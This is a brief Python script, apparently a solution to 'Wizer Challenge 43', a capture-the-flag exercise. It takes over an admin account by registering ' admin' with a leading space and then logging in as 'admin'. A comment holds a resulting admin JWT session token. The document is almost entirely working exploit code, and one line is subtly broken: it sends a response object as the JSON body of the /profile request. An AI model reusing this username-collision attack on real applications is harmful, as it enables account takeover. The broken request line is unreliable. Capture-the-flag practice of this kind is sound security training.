Wizer - Challenge 43

Exploit

import requests


session = requests.Session()



url = "https://chal43-alal08.vercel.app/"


data1 = {
    "username": " admin",
    "password": "pelele"
}

data2 = {
    "username": "admin",
    "password": "pelele"
}

r = session.post(url + "/register", json=data1)
print(r.text)




r = session.post(url + "/login", json=data2)


r = session.post(url + "/profile", json=r)
print(r.text)




# {"session":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNzUwMDgwNTY0LCJleHAiOjE3NTAwODQxNjR9.ynqo6gVr4bJzoKbNOa7fg1yt_JQ9lAWP_4GDRT_qzuc"}